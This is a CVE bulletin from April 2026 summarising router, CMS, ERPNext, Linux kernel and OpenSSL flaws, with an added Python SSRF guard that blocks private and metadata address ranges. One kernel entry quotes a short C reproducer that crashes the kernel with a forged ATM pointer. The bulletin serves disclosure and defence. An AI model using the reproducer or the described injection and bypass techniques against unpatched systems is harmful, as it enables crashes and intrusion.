TP-Link Systems Inc.--AX53 v1.0: An OS command injection vulnerability in the dnsmasq module of TP-Link Archer AX53 v1.0 allows an authenticated adjacent attacker to execute arbitrary code when a specially crafted configuration file is processed, due to insufficient input validation. Successful exploitation may allow the attacker to modify device configuration, access sensitive information, or further compromise system integrity. This issue affects AX53 v1.0: before 1.7.1 Build 20260213.
Published: 2026-04-08. CVSS: not yet calculated. CVE-2026-30818 [ https://www.cve.org/CVERecord?id=CVE-2026-30818 ]
Source: https://www.tp-link.com/my/support/download/archer-ax53/v1/#Firmware https://www.tp-link.com/en/support/download/archer-ax53/v1/#Firmware https://talosintelligence.com/vulnerability_reports/ https://www.tp-link.com/us/support/faq/5055/

n/a--n/a: A Server-Side Request Forgery (SSRF) vulnerability exists in the Print Format functionality of ERPNext v16.0.1 and Frappe Framework v16.1.1, where user-supplied HTML is insufficiently sanitized before being rendered into PDF. When generating PDFs from user-controlled HTML content, the application allows the inclusion of HTML elements such as <iframe> that reference external resources. The PDF rendering engine automatically fetches these resources on the server side. An attacker can abuse this behavior to force the server to make arbitrary HTTP requests to internal services, including cloud metadata endpoints, potentially leading to sensitive information disclosure.
Published: 2026-04-08. CVSS: not yet calculated. CVE-2026-31017 [ https://www.cve.org/CVERecord?id=CVE-2026-31017 ]
Source: http://frappe.com https://github.com/PhDg1410/CVE/tree/main/CVE-2026-31017

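The ERPNext/Frappe entry above and the Chartbrew entry (CVE-2026-30232) earlier in this bulletin are the same failure from two directions: a server fetches a URL the user chose, either directly (an API connection URL) or indirectly (an `<iframe>` or `<img>` in HTML handed to a PDF renderer), with no check on where that URL leads. The block below is an added example, not Chartbrew, ERPNext or Frappe code. `validate_fetch_url` applies the check both advisories lack (resolve the host, refuse loopback, link-local, private and metadata ranges, and hand back the addresses to connect to so the caller does not resolve a second time), and `extract_resource_urls` pulls the targets a renderer would fetch out of user HTML. The resolver is injected and `STATIC_DNS` is a constructed table so the example runs offline; the blocked-range list is this example's own.

```python
"""Outbound-fetch guard for user-supplied URLs and HTML (CVE-2026-30232 and
CVE-2026-31017 patterns).

Added example; not Chartbrew, ERPNext or Frappe code. validate_fetch_url
resolves the host, refuses loopback, link-local, private and metadata ranges,
and returns the addresses to connect to so the caller does not resolve again
(DNS rebinding). extract_resource_urls pulls the src/href targets a PDF
renderer would fetch out of user HTML. The resolver is injected; STATIC_DNS is
a constructed table so the example runs offline. The blocked-range list is this
example's own.
"""
import ipaddress
import re
from urllib.parse import urlsplit

BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8", "169.254.0.0/16",
    "172.16.0.0/12", "192.168.0.0/16", "224.0.0.0/4", "240.0.0.0/4",
    "::/128", "::1/128", "fc00::/7", "fe80::/10", "ff00::/8",
)]

# Constructed DNS table standing in for a real resolver.
STATIC_DNS = {
    "api.example.com": ["93.184.216.34"],
    "localhost": ["127.0.0.1"],
    "metadata.internal": ["169.254.169.254"],
    "rebind.example": ["93.184.216.34", "10.0.0.5"],   # one public, one private answer
}


def static_resolver(host: str):
    return STATIC_DNS.get(host.lower(), [])


class FetchBlocked(ValueError):
    pass


def _is_blocked(addr) -> bool:
    if addr.version == 6 and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped                     # ::ffff:169.254.169.254
    return any(addr in net for net in BLOCKED_NETWORKS)


def validate_fetch_url(url: str, resolver=static_resolver, schemes=("http", "https")):
    """Return the list of IP addresses a fetch of `url` may connect to, or raise."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in schemes:
        raise FetchBlocked(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise FetchBlocked("missing host")
    try:
        addrs = [ipaddress.ip_address(host)]              # dotted or colon literal
    except ValueError:
        try:
            addrs = [ipaddress.ip_address(int(host, 0))]  # 2130706433, 0x7f000001
        except ValueError:
            addrs = [ipaddress.ip_address(a) for a in resolver(host)]
    if not addrs:
        raise FetchBlocked(f"unresolvable host: {host!r}")
    for addr in addrs:                                    # every answer must be acceptable
        if _is_blocked(addr):
            raise FetchBlocked(f"{host!r} resolves to blocked address {addr}")
    return [str(a) for a in addrs]


def is_safe_fetch_url(url: str, resolver=static_resolver) -> bool:
    try:
        validate_fetch_url(url, resolver)
        return True
    except FetchBlocked:
        return False


_RESOURCE_ATTR = re.compile(
    r"""<(?:iframe|img|script|link|embed|object|source|video|audio)\b[^>]*?"""
    r"""\s(?:src|href|data)\s*=\s*["']?([^"'\s>]+)""",
    re.IGNORECASE,
)


def extract_resource_urls(html: str):
    """URLs a server-side HTML-to-PDF renderer would try to fetch."""
    return _RESOURCE_ATTR.findall(html)


def check_html_for_ssrf(html: str, resolver=static_resolver):
    """(url, allowed) for every fetchable resource in user-supplied HTML."""
    return [(u, is_safe_fetch_url(u, resolver)) for u in extract_resource_urls(html)]
```

Two design points: every resolved address is checked, so a name that answers with one public and one private address (the `rebind.example` entry) is refused rather than left to chance, and the validated addresses are what the caller should connect to. A renderer that follows redirects needs the same check applied to each hop.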
n/a--n/a: A vulnerability was identified in stata-mcp prior to v1.13.0 where insufficient validation of user-supplied Stata do-file content can lead to command execution.
Published: 2026-04-08. CVSS: not yet calculated. CVE-2026-31040 [ https://www.cve.org/CVERecord?id=CVE-2026-31040 ]
Source: https://github.com/SepineTam/stata-mcp/issues/20 https://github.com/SepineTam/stata-mcp/pull/21 https://github.com/SepineTam/stata-mcp/commit/52413ce https://github.com/SepineTam/stata-mcp/releases/tag/v1.13.0

    n/a -- n/a
        A double free vulnerability exists in librz/bin/format/le/le.c in the function le_load_fixup_record(). When processing malformed or circular LE fixup chains, relocation entries may be freed multiple times during error handling. A specially crafted LE binary can trigger heap corruption and cause the application to crash, resulting in a denial-of-service condition. An attacker with a crafted binary could cause a denial of service when the tool is integrated on a service pipeline.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31053 [ https://www.cve.org/CVERecord?id=CVE-2026-31053 ]
        Source: https://github.com/rizinorg/rizin/issues/5753 https://github.com/rizinorg/rizin/pull/5795
    n/a -- Aggressive HiPER Router 1200GW
        UTT Aggressive HiPER 1200GW v2.5.3-170306 was discovered to contain a buffer overflow in the timeRangeName parameter of the formConfigDnsFilterGlobal function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31058 [ https://www.cve.org/CVERecord?id=CVE-2026-31058 ]
        Source: https://github.com/zxq0408/Vul202601/blob/main/2.md
    n/a -- Aggressive HiPER Router 520W
        A remote command execution (RCE) vulnerability in the /goform/formDia component of UTT Aggressive HiPER 520W v3v1.7.7-180627 allows attackers to execute arbitrary commands via a crafted string.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31059 [ https://www.cve.org/CVERecord?id=CVE-2026-31059 ]
        Source: https://github.com/zxq0408/Vul202601/blob/main/9.md
    n/a -- Aggressive HiPER Router 810G
        UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a buffer overflow in the notes parameter of the formGroupConfig function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31060 [ https://www.cve.org/CVERecord?id=CVE-2026-31060 ]
        Source: https://github.com/zxq0408/Vul202601/blob/main/5.md
    n/a -- Aggressive HiPER Router 810G
        UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a buffer overflow in the timestart parameter of the ConfigAdvideo function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31061 [ https://www.cve.org/CVERecord?id=CVE-2026-31061 ]
        Source: https://github.com/zxq0408/Vul202601/blob/main/1.md
    n/a -- Aggressive HiPER Router 510W
        UTT Aggressive 520W v3v1.7.7-180627 was discovered to contain a buffer overflow in the filename parameter of the formFtpServerDirConfig function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31062 [ https://www.cve.org/CVERecord?id=CVE-2026-31062 ]
        Source: https://github.com/zxq0408/Vul202601/blob/main/7.md
    n/a -- Aggressive HiPER Router 1200GW
        UTT Aggressive HiPER 1200GW v2.5.3-170306 was discovered to contain a buffer overflow in the pools parameter of the formArpBindConfig function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31063 [ https://www.cve.org/CVERecord?id=CVE-2026-31063 ]
        Source: https://github.com/zxq0408/Vul202601/blob/main/4.md
    n/a -- Aggressive HiPER Router 520W
        UTT Aggressive 520W v3v1.7.7-180627 was discovered to contain a buffer overflow in the addCommand parameter of the formConfigCliForEngineerOnly function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31065 [ https://www.cve.org/CVERecord?id=CVE-2026-31065 ]
        Source: https://github.com/zxq0408/Vul202601/blob/main/8.md
    n/a -- Aggressive HiPER Router 810G
        UTT Aggressive HiPER 810G v3v1.7.7-171114 was discovered to contain a buffer overflow in the selDateType parameter of the formTaskEdit function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31066 [ https://www.cve.org/CVERecord?id=CVE-2026-31066 ]
        Source: https://github.com/zxq0408/Vul202601/blob/main/6.md
    n/a -- UTT Aggressive 520W
        A remote command execution (RCE) vulnerability in the /goform/formReleaseConnect component of UTT Aggressive 520W v3v1.7.7-180627 allows attackers to execute arbitrary commands via a crafted string.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31067 [ https://www.cve.org/CVERecord?id=CVE-2026-31067 ]
        Source: https://github.com/zxq0408/Vul202601/blob/main/10.md
    n/a -- Kaleris YMS
        Incorrect access control in Kaleris YMS v7.2.2.1 allows authenticated attackers with only the shipping/receiving role to view the truck's dashboard resources.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31150 [ https://www.cve.org/CVERecord?id=CVE-2026-31150 ]
        Source: https://kaleris.com/solutions/yard-management/ https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31150
    n/a -- Kaleris YMS
        An issue in the login mechanism of Kaleris YMS v7.2.2.1 allows attackers to bypass login verification to access the application's resources.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31151 [ https://www.cve.org/CVERecord?id=CVE-2026-31151 ]
        Source: https://kaleris.com/solutions/yard-management/ https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31151
    Bynder[.]com -- Bynder v0.1.394
        A stored cross-site scripting (XSS) vulnerability in Bynder v0.1.394 allows attackers to execute arbitrary web scripts or HTML via a crafted payload.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31153 [ https://www.cve.org/CVERecord?id=CVE-2026-31153 ]
        Source: https://www.bynder.com/en/ https://github.com/Henkel-CyberVM/CVEs/tree/main/CVE-2026-31153
    Totolink[.]net -- A3300R router
        An issue was discovered in ToToLink A3300R firmware v17.0.0cu.557_B20221024 allowing attackers to execute arbitrary commands via the stun-pass parameter to /cgi-bin/cstecgi.cgi.
        Published: 2026-04-09 | CVSS: not yet calculated | CVE-2026-31170 [ https://www.cve.org/CVERecord?id=CVE-2026-31170 ]
        Source: https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300r-stun-pass-cmd-injection
    Altenar[.]com -- Sportsbook Software Platform SB2 v.2.0
        Cross Site Scripting vulnerability in Altenar Sportsbook Software Platform (SB2) v.2.0 allows a remote attacker to obtain sensitive information and execute arbitrary code via the URL parameter.
        Published: 2026-04-10 | CVSS: not yet calculated | CVE-2026-31262 [ https://www.cve.org/CVERecord?id=CVE-2026-31262 ]
        Source: https://github.com/nikolas-ch/CVEs/tree/main/Altenar_SportsBook_Platform_SB2/ORtoXSS https://github.com/nikolas-ch/CVEs/blob/main/Altenar_SportsBook_Platform_SB2/ORtoXSS/ORtoXSS.txt
    n/a -- n/a
        megagao production_ssm v1.0 contains an authorization bypass vulnerability in the user addition functionality. The insert() method in UserController.java lacks authentication checks, allowing unauthenticated attackers to create super administrator accounts by directly accessing the /user/insert endpoint. This leads to complete system compromise.
        Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-31271 [ https://www.cve.org/CVERecord?id=CVE-2026-31271 ]
        Source: https://github.com/clockw1se0v0/Vul/blob/main/production_ssm/Unauthorized.md
    n/a -- n/a
        MRCMS 3.1.2 contains an access control vulnerability. The save() method in src/main/java/org/marker/mushroom/controller/UserController.java lacks proper authorization validation, enabling direct addition of super administrator accounts without authentication.
        Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-31272 [ https://www.cve.org/CVERecord?id=CVE-2026-31272 ]
        Source: https://github.com/clockw1se0v0/Vul/blob/main/MRCMS/Unauthorized.md
    n/a -- Feehi CMS
        An authenticated stored cross-site scripting (XSS) vulnerability in the creation/editing module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Content field.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31313 [ https://www.cve.org/CVERecord?id=CVE-2026-31313 ]
        Source: http://feehi.com https://github.com/liufee/cms/issues/80
    n/a -- Feehi CMS
        An authenticated stored cross-site scripting (XSS) vulnerability in Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Page Sign parameter.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31350 [ https://www.cve.org/CVERecord?id=CVE-2026-31350 ]
        Source: https://github.com/liufee/cms https://github.com/liufee/cms/issues/82
    n/a -- Feehi CMS
        An authenticated stored cross-site scripting (XSS) vulnerability in the creation/editing module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Title parameter.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31351 [ https://www.cve.org/CVERecord?id=CVE-2026-31351 ]
        Source: https://github.com/liufee/cms https://github.com/liufee/cms/issues/81
    n/a -- Feehi CMS
        An authenticated stored cross-site scripting (XSS) vulnerability in the Role Management module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Role Name parameter.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31352 [ https://www.cve.org/CVERecord?id=CVE-2026-31352 ]
        Source: https://github.com/liufee/cms https://github.com/liufee/cms/issues/83
    n/a -- Feehi CMS
        An authenticated stored cross-site scripting (XSS) vulnerability in the Category module of Feehi CMS v2.1.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Name parameter.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31353 [ https://www.cve.org/CVERecord?id=CVE-2026-31353 ]
        Source: https://github.com/liufee/cms https://github.com/liufee/cms/issues/84
    n/a -- Feehi CMS
        Multiple authenticated stored cross-site scripting (XSS) vulnerabilities in the Permissions module of Feehi CMS v2.1.1 allow attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the Group, Category or Description parameters.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31354 [ https://www.cve.org/CVERecord?id=CVE-2026-31354 ]
        Source: https://github.com/liufee/cms https://github.com/liufee/cms/issues/85
    Linux -- Linux
        In the Linux kernel, the following vulnerability has been resolved: media: dvb-net: fix OOB access in ULE extension header tables. The ule_mandatory_ext_handlers[] and ule_optional_ext_handlers[] tables in handle_one_ule_extension() are declared with 255 elements (valid indices 0-254), but the index htype is derived from network-controlled data as (ule_sndu_type & 0x00FF), giving a range of 0-255. When htype equals 255, an out-of-bounds read occurs on the function pointer table, and the OOB value may be called as a function pointer. Add a bounds check on htype against the array size before either table is accessed. Out-of-range values now cause the SNDU to be discarded.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31405 [ https://www.cve.org/CVERecord?id=CVE-2026-31405 ]
        Source: https://git.kernel.org/stable/c/29ef43ceb121d67b87f4cbb08439e4e9e732eff8 https://git.kernel.org/stable/c/1a6da3dbb9985d00743073a1cc1f96e59f5abc30 https://git.kernel.org/stable/c/145e50c2c700fa52b840df7bab206043997dd18e https://git.kernel.org/stable/c/8bde543d2a5f935ba2a6a6325a2e02f8a9256fbe https://git.kernel.org/stable/c/f2b65dcb78c8990e4c68a906627433be1fe38a92 https://git.kernel.org/stable/c/24d87712727a5017ad142d63940589a36cd25647
    Linux -- Linux
        In the Linux kernel, the following vulnerability has been resolved: xfrm: Fix work re-schedule after cancel in xfrm_nat_keepalive_net_fini(). After cancel_delayed_work_sync() is called from xfrm_nat_keepalive_net_fini(), xfrm_state_fini() flushes remaining states via __xfrm_state_delete(), which calls xfrm_nat_keepalive_state_updated() to re-schedule nat_keepalive_work. The following is a simple race scenario (cpu0 / cpu1):
            cleanup_net() [Round 1]
              ops_undo_list()
                xfrm_net_exit()
                  xfrm_nat_keepalive_net_fini()
                    cancel_delayed_work_sync(nat_keepalive_work);
                  xfrm_state_fini()
                    xfrm_state_flush()
                      xfrm_state_delete(x)
                        __xfrm_state_delete(x)
                          xfrm_nat_keepalive_state_updated(x)
                            schedule_delayed_work(nat_keepalive_work);
              rcu_barrier();
              net_complete_free();
                net_passive_dec(net);
                  llist_add(&net->defer_free_list, &defer_free_list);
            cleanup_net() [Round 2]
              rcu_barrier();
              net_complete_free()
                kmem_cache_free(net_cachep, net);
            nat_keepalive_work()  // on freed net
        To prevent this, cancel_delayed_work_sync() is replaced with disable_delayed_work_sync().
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31406 [ https://www.cve.org/CVERecord?id=CVE-2026-31406 ]
        Source: https://git.kernel.org/stable/c/32d0f44c2f14d60fe8e920e69a28c11051543ec1 https://git.kernel.org/stable/c/2255ed6adbc3100d2c4a83abd9d0396d04b87792 https://git.kernel.org/stable/c/21f2fc49ca6faa393c31da33b8a4e6c41fc84c13 https://git.kernel.org/stable/c/daf8e3b253aa760ff9e96c7768a464bc1d6b3c90
    Linux -- Linux
        In the Linux kernel, the following vulnerability has been resolved: netfilter: conntrack: add missing netlink policy validations. Hyunwoo Kim reports out-of-bounds access in sctp and ctnetlink. These attributes are used by the kernel without any validation. Extend the netlink policies accordingly. Quoting the reporter: nlattr_to_sctp() assigns the user-supplied CTA_PROTOINFO_SCTP_STATE value directly to ct->proto.sctp.state without checking that it is within the valid range. [..] and: ... with exp->dir = 100, the access at ct->master->tuplehash[100] reads 5600 bytes past the start of a 320-byte nf_conn object, causing a slab-out-of-bounds read confirmed by UBSAN.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31407 [ https://www.cve.org/CVERecord?id=CVE-2026-31407 ]
        Source: https://git.kernel.org/stable/c/0fbae1e74493d5a160a70c51aeba035d8266ea7d https://git.kernel.org/stable/c/f900e1d77ee0ef87bfb5ab3fe60f0b3d8ad5ba05
    Linux -- Linux
        In the Linux kernel, the following vulnerability has been resolved: Bluetooth: SCO: Fix use-after-free in sco_recv_frame() due to missing sock_hold. sco_recv_frame() reads conn->sk under sco_conn_lock() but immediately releases the lock without holding a reference to the socket. A concurrent close() can free the socket between the lock release and the subsequent sk->sk_state access, resulting in a use-after-free. Other functions in the same file (sco_sock_timeout(), sco_conn_del()) correctly use sco_sock_hold() to safely hold a reference under the lock. Fix by using sco_sock_hold() to take a reference before releasing the lock, and adding sock_put() on all exit paths.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31408 [ https://www.cve.org/CVERecord?id=CVE-2026-31408 ]
        Source: https://git.kernel.org/stable/c/b0a7da0e3f7442545f071499beb36374714bb9de https://git.kernel.org/stable/c/45aaca995e4a7a05b272a58e7ab2fff4f611b8f1 https://git.kernel.org/stable/c/108b81514d8f2535eb16651495cefb2250528db3 https://git.kernel.org/stable/c/7197462e90b8ce15caa1ae15d4bc2bb8cd21b11e https://git.kernel.org/stable/c/e76e8f0581ef555eacc11dbb095e602fb30a5361 https://git.kernel.org/stable/c/598dbba9919c5e36c54fe1709b557d64120cb94b
    Linux -- Linux
        In the Linux kernel, the following vulnerability has been resolved: ksmbd: unset conn->binding on failed binding request. When a multichannel SMB2_SESSION_SETUP request with SMB2_SESSION_REQ_FLAG_BINDING fails, ksmbd sets conn->binding = true but never clears it on the error path. This leaves the connection in a binding state where all subsequent ksmbd_session_lookup_all() calls fall back to the global sessions table. Fix it by clearing conn->binding = false in the error path.
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31409 [ https://www.cve.org/CVERecord?id=CVE-2026-31409 ]
        Source: https://git.kernel.org/stable/c/d073870dab8f6dadced81d13d273ff0b21cb7f4e https://git.kernel.org/stable/c/6ebef4a220a1ebe345de899ebb9ae394206fe921 https://git.kernel.org/stable/c/89afe5e2dbea6e9d8e5f11324149d06fa3a4efca https://git.kernel.org/stable/c/9feb2d1bf86d9e5e66b8565f37f8d3a7d281a772 https://git.kernel.org/stable/c/6260fc85ed1298a71d24a75d01f8b2e56d489a60 https://git.kernel.org/stable/c/282343cf8a4a5a3603b1cb0e17a7083e4a593b03
    Linux -- Linux
        In the Linux kernel, the following vulnerability has been resolved: ksmbd: use volume UUID in FS_OBJECT_ID_INFORMATION. Use sb->s_uuid for a proper volume identifier as the primary choice. For filesystems that do not provide a UUID, fall back to stfs.f_fsid obtained from vfs_statfs().
        Published: 2026-04-06 | CVSS: not yet calculated | CVE-2026-31410 [ https://www.cve.org/CVERecord?id=CVE-2026-31410 ]
        Source: https://git.kernel.org/stable/c/ce00616bc1df675bfdacc968f2bf7c51f4669227 https://git.kernel.org/stable/c/3d80ebe6d1b7bc9ad20fd9b0c1a0c56d804f8a0a https://git.kernel.org/stable/c/c283a6ffe6d5d6e5594d991286b9ce15951572e1 https://git.kernel.org/stable/c/3a64125730cabc34fccfbc230c2667c2e14f7308
    Linux -- Linux
        In the Linux kernel, the following vulnerability has been resolved: net: atm: fix crash due to unvalidated vcc pointer in sigd_send(). Reproducer available at [1]. The ATM send path (sendmsg -> vcc_sendmsg -> sigd_send) reads the vcc pointer from msg->vcc and uses it directly without any validation. This pointer comes from userspace via sendmsg() and can be arbitrarily forged:
            int fd = socket(AF_ATMSVC, SOCK_DGRAM, 0);
            ioctl(fd, ATMSIGD_CTRL);                    // become ATM signaling daemon
            struct msghdr msg = { .msg_iov = &iov, ... };
            *(unsigned long *)(buf + 4) = 0xdeadbeef;   // fake vcc pointer
            sendmsg(fd, &msg, 0);                       // kernel dereferences 0xdeadbeef
        In normal operation, the kernel sends the vcc pointer to the signaling daemon via sigd_enq() when processing operations like connect(), bind(), or listen(). The daemon is expected to return the same pointer when responding. However, a malicious daemon can send arbitrary pointer values. Fix this by introducing find_get_vcc() which validates the pointer by searching through vcc_hash (similar to how sigd_close() iterates over all VCCs), and acquires a reference via sock_hold() if found. Since struct atm_vcc embeds struct sock as its first member, they share the same lifetime. Therefore using sock_hold/sock_put is sufficient to keep the vcc alive while it is being used. Note that there may be a race with sigd_close() which could mark the vcc with various flags (e.g., ATM_VF_RELEASED) after find_get_vcc() returns. However, sock_hold() guarantees the memory remains valid, so this race only affects the logical state, not memory safety. [1]: https://gist.github.com/mrpre/1ba5949c45529c511152e2f4c755b0f3
        Published: 2026-04-08 | CVSS: not yet calculated | CVE-2026-31411 [ https://www.cve.org/CVERecord?id=CVE-2026-31411 ]
        Source: https://git.kernel.org/stable/c/c96549d07dfdd51aadf0722cfb40711574424840 https://git.kernel.org/stable/c/1c8bda3df028d5e54134077dcd09f46ca8cfceb5 https://git.kernel.org/stable/c/3e1a8b00095246a9a2b46b57f6d471c6d3c00ed2 https://git.kernel.org/stable/c/e3f80666c2739296c3b69a127300455c43aa1067 https://git.kernel.org/stable/c/21c303fec138c002f90ed33bce60e807d53072bb https://git.kernel.org/stable/c/69d3f9ee5489e6e8b66defcfa226e91d82393297 https://git.kernel.org/stable/c/440c9a5fc477a8ee259d8bf669531250b8398651 https://git.kernel.org/stable/c/ae88a5d2f29b69819dc7b04086734439d074a643
    Linux -- Linux
        In the Linux kernel, the following vulnerability has been resolved: usb: gadget: f_mass_storage: Fix potential integer overflow in check_command_size_in_blocks(). The `check_command_size_in_blocks()` function calculates the data size in bytes by left shifting `common->data_size_from_cmnd` by the block size (`common->curlun->blkbits`). However, it does not validate whether this shift operation will cause an integer overflow. Initially, the block size is set up in `fsg_lun_open()`, and the `common->data_size_from_cmnd` is set up in `do_scsi_command()`. During initialization, there is no integer overflow check for the interaction between two variables. So if a malicious USB host sends a SCSI READ or WRITE command requesting a large amount of data (`common->data_size_from_cmnd`), the left shift operation can wrap around. This results in a truncated data size, which can bypass boundary checks and potentially lead to memory corruption or out-of-bounds accesses. Fix this by using the check_shl_overflow() macro to safely perform the shift and catch any overflows.
        Published: 2026-04-10 | CVSS: not yet calculated | CVE-2026-31412 [ https://www.cve.org/CVERecord?id=CVE-2026-31412 ]
        Source: https://git.kernel.org/stable/c/91817ad5452defe69bc7bc0e355f0ed5d01125cc https://git.kernel.org/stable/c/ce0caaed5940162780c5c223b8ae54968a5f059b https://git.kernel.org/stable/c/228b37936376143f4b60cc6828663f6eaceb81b5 https://git.kernel.org/stable/c/3428dc5520c811e66622b2f5fa43341bf9a1f8b3 https://git.kernel.org/stable/c/387ebb0453b99d71491419a5dc4ab4bee0cacbac https://git.kernel.org/stable/c/8479891d1f04a8ce55366fe4ca361ccdb96f02e1
    Linux -- Linux
        In the Linux kernel, the following vulnerability has been resolved: bpf: Fix unsound scalar forking in maybe_fork_scalars() for BPF_OR. maybe_fork_scalars() is called for both BPF_AND and BPF_OR when the source operand is a constant. When dst has signed range [-1, 0], it forks the verifier state: the pushed path gets dst = 0, the current path gets dst = -1. For BPF_AND this is correct: 0 & K == 0. For BPF_OR this is wrong: 0 | K == K, not 0. The pushed path therefore tracks dst as 0 when the runtime value is K, producing an exploitable verifier/runtime divergence that allows out-of-bounds map access. Fix this by passing env->insn_idx (instead of env->insn_idx + 1) to push_stack(), so the pushed path re-executes the ALU instruction with dst = 0 and naturally computes the correct result for any opcode.
        Published: 2026-04-12 | CVSS: not yet calculated | CVE-2026-31413 [ https://www.cve.org/CVERecord?id=CVE-2026-31413 ]
        Source: https://git.kernel.org/stable/c/342aa1ee995ef5bbf876096dc3a5e51218d76fa4 https://git.kernel.org/stable/c/58bd87d0e69204dbd739e4387a1edb0c4b1644e7 https://git.kernel.org/stable/c/d13281ae7ea8902b21d99d10a2c8caf0bdec0455 https://git.kernel.org/stable/c/c845894ebd6fb43226b3118d6b017942550910c5
    OpenSSL -- OpenSSL
        Issue summary: Converting an excessively large OCTET STRING value to a hexadecimal string leads to a heap buffer overflow on 32 bit platforms. Impact summary: A heap buffer overflow may lead to a crash or possibly an attacker controlled code execution or other undefined behavior. If an attacker can supply a crafted X.509 certificate with an excessively large OCTET STRING value in extensions such as the Subject Key Identifier (SKID) or Authority Key Identifier (AKID) which are being converted to hex, the size of the buffer needed for the result is calculated as multiplication of the input length by 3. On 32 bit platforms, this multiplication may overflow resulting in the allocation of a smaller buffer and a heap buffer overflow. Applications and services that print or log contents of untrusted X.509 certificates are vulnerable to this issue. As the certificates would have to have sizes of over 1 Gigabyte, printing or logging such certificates is a fairly unlikely operation and only 32 bit platforms are affected, this issue was assigned Low severity. The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.
        Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-31789 [ https://www.cve.org/CVERecord?id=CVE-2026-31789 ]
        Source:
            OpenSSL Advisory [ https://openssl-library.org/news/secadv/20260407.txt ]
            3.6.2 git commit [ https://github.com/openssl/openssl/commit/a24216018e1ede8ff01a4ff5afff7dfbd443e2f9 ]
            3.5.6 git commit [ https://github.com/openssl/openssl/commit/945b935ac66cc7f1a41f1b849c7c25adb5351f49 ]
            3.4.5 git commit [ https://github.com/openssl/openssl/commit/364f095b80601db632b0def6a33316967f863bde ]
            3.3.7 git commit [ https://github.com/openssl/openssl/commit/7a9087efd769f362ad9c0e30c7baaa6bbfa65ecf ]
            3.0.20 git commit [ https://github.com/openssl/openssl/commit/a91e537d16d74050dbde50bb0dfb1fe9930f0521 ]
    OpenSSL -- OpenSSL
        Issue summary: Applications using RSASVE key encapsulation to establish a secret encryption key can send contents of an uninitialized memory buffer to a malicious peer. Impact summary: The uninitialized buffer might contain sensitive data from the previous execution of the application process which leads to sensitive data leakage to an attacker. RSA_public_encrypt() returns the number of bytes written on success and -1 on error. The affected code tests only whether the return value is non-zero. As a result, if RSA encryption fails, encapsulation can still return success to the caller, set the output lengths, and leave the caller to use the contents of the ciphertext buffer as if a valid KEM ciphertext had been produced. If applications use EVP_PKEY_encapsulate() with RSA/RSASVE on an attacker-supplied invalid RSA public key without first validating that key, then this may cause stale or uninitialized contents of the caller-provided ciphertext buffer to be disclosed to the attacker in place of the KEM ciphertext. As a workaround, calling EVP_PKEY_public_check() or EVP_PKEY_public_check_quick() before EVP_PKEY_encapsulate() will mitigate the issue. The FIPS modules in 3.6, 3.5, 3.4, 3.3, 3.1 and 3.0 are affected by this issue.
        Published: 2026-04-07 | CVSS: not yet calculated | CVE-2026-31790 [ https://www.cve.org/CVERecord?id=CVE-2026-31790 ]
        Source:
            OpenSSL Advisory [ https://openssl-library.org/news/secadv/20260407.txt ]
            3.6.2 git commit [ https://github.com/openssl/openssl/commit/abd8b2eec7e3f3fda60ecfb68498b246b52af482 ]
            3.5.6 git commit [ https://github.com/openssl/openssl/commit/001e01db3e996e13ffc72386fe79d03a6683b5ac ]
            3.4.5 git commit [ https://github.com/openssl/openssl/commit/d5f8e71cd0a54e961d0c3b174348f8308486f790 ]
